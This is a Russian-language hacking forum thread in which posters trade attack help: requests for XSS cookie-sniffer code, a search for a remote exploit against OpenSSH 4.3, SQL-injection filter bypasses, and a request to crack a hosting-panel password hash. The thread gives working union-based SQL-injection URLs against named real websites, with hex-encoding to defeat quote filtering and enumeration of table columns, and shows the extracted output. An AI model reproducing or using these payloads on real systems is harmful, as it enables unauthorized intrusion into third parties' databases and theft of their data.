mailbrush я не понял? Можешь вделить то место на коде javascripta, куда нужно поставить код сниффера или сам постав код сниффера, а я сам догадаюсь уже.
Ну никто не ответит? Я знаю что для вас не трудно. Если не помешает поставьте из любого сниффера код в javascript xss, а потом я пойму. плизззззззззз
Есть удаленный хост с открым 22 портом. На нем висит SSH2.0-OpenSSH_4.3. Хотелось бы найти возможность удаленно управлять. Искал на милворм, нашел только на Denial, да и он не сработал... Испытывал на cygwin. Есть еще варианты?
2Cehennem ветка чуть ниже "XSS для чайников" , только чтоб работало переводиш в чар как ты в своем примере показывал. 2cristoff брут или ищи другие баги на серваке.
Доброго времени суток всем уважаемым! Подскажите плз, как можно обойти фильтрацию ',' (запятая) в sql при выполнении запросов типа userid=10+UNION+SELECT+1,2,3,4,5,6/* и userid=10+and+ASCII(SUBSTRING(user(),1,1))>0/* Заранее всем благодарен
Если обычный str_replace - никак запятую не поставишь. Но я думаю, можно одним способом, который я сейчас проверю.
В слепых скулях можно юзать так: userid=10+and+ASCII(SUBSTRING(user() FROM 1 FOR 1))>0/* первое - с какого символа, второе - сколько символов Единственная накладка - в выборке с лимитом нужна запятая, но можно обойтись, к примеру этим where id = 1 и т.д.
Еще вопросик. Может кто сталкивался с HELM - управление доменнами, хостом etc так вот вопрос - как расшифровать хеши? Сам хеш - 61F3ADC9E4F1D793B2614ACD1B3B7332C0730E461C395DCDB1C846784C6B00BC Соответствует паролю 558dd-dd Так же имеется файл, который как мне кажется и криптует все это Если у кого получится рассшифровать или есть какие либо идеии - побеспокойте плз в асю 29ЧO78Ч26
Добрый день уважаемые гуру, вот занялся изучением SQL-инъекций, не могу разобраться: Делаю инъекции для определения имен таблиц: Code: http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,2,TABLE_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+4,1 Все работает, перебирая limit нашел интересную табличку guest_book Делаю так, чтоб узнать колонки: Code: http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,2,COLUMN_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='guest_book'+LIMIT+1,1 НЕ работает ! Code: Select_Error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'guest_book\' LIMIT 1,1' at line 5SELECT `mar_news`.`news_date`, `mar_news`.`news_small_en`, `mar_news`.`news_big_en`, `mar_news`.`photo_alb_page_id`,`mar_news`.`file_en`,`mar_news`.`file_anchor_en`, `mar_news`.`category_name_id` FROM `mar_news` WHERE `mar_news`.`news_id` = -32 union select 1,2,COLUMN_NAME,4,5,6,7 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=\'guest_book\' LIMIT 1,1 Подскажите пожалуйста в чем загвоздка.
Вообще то WHERE+TABLE_NAME=0x67756573745f626f6f6b, так как фильтруются кавычки, нужно либо хексить, либо чарить. Code: http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,2,COLUMN_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x67756573745f626f6f6b+LIMIT+1,1 Ну и для удобства вот так: Code: http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,2,group_concat(COLUMN_NAME),4,5,6,7+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x67756573745f626f6f6b--+ Получаем: Code: guest_book_id,gb_name,gb_email,gb_date,gb_text,gb_lang
Вот столкнулся, что и как дальше незнаю и можно ли из этого что то получить: http://sk-kr.ru/ далее: http://sk-kr.ru/index.php?id=2&cid=2 подставляя ' в любой из параметров получаем чистый экран, по запросу : http://sk-kr.ru/index.php?id=2 получаем: собсно, можно ли провести инъекцию ?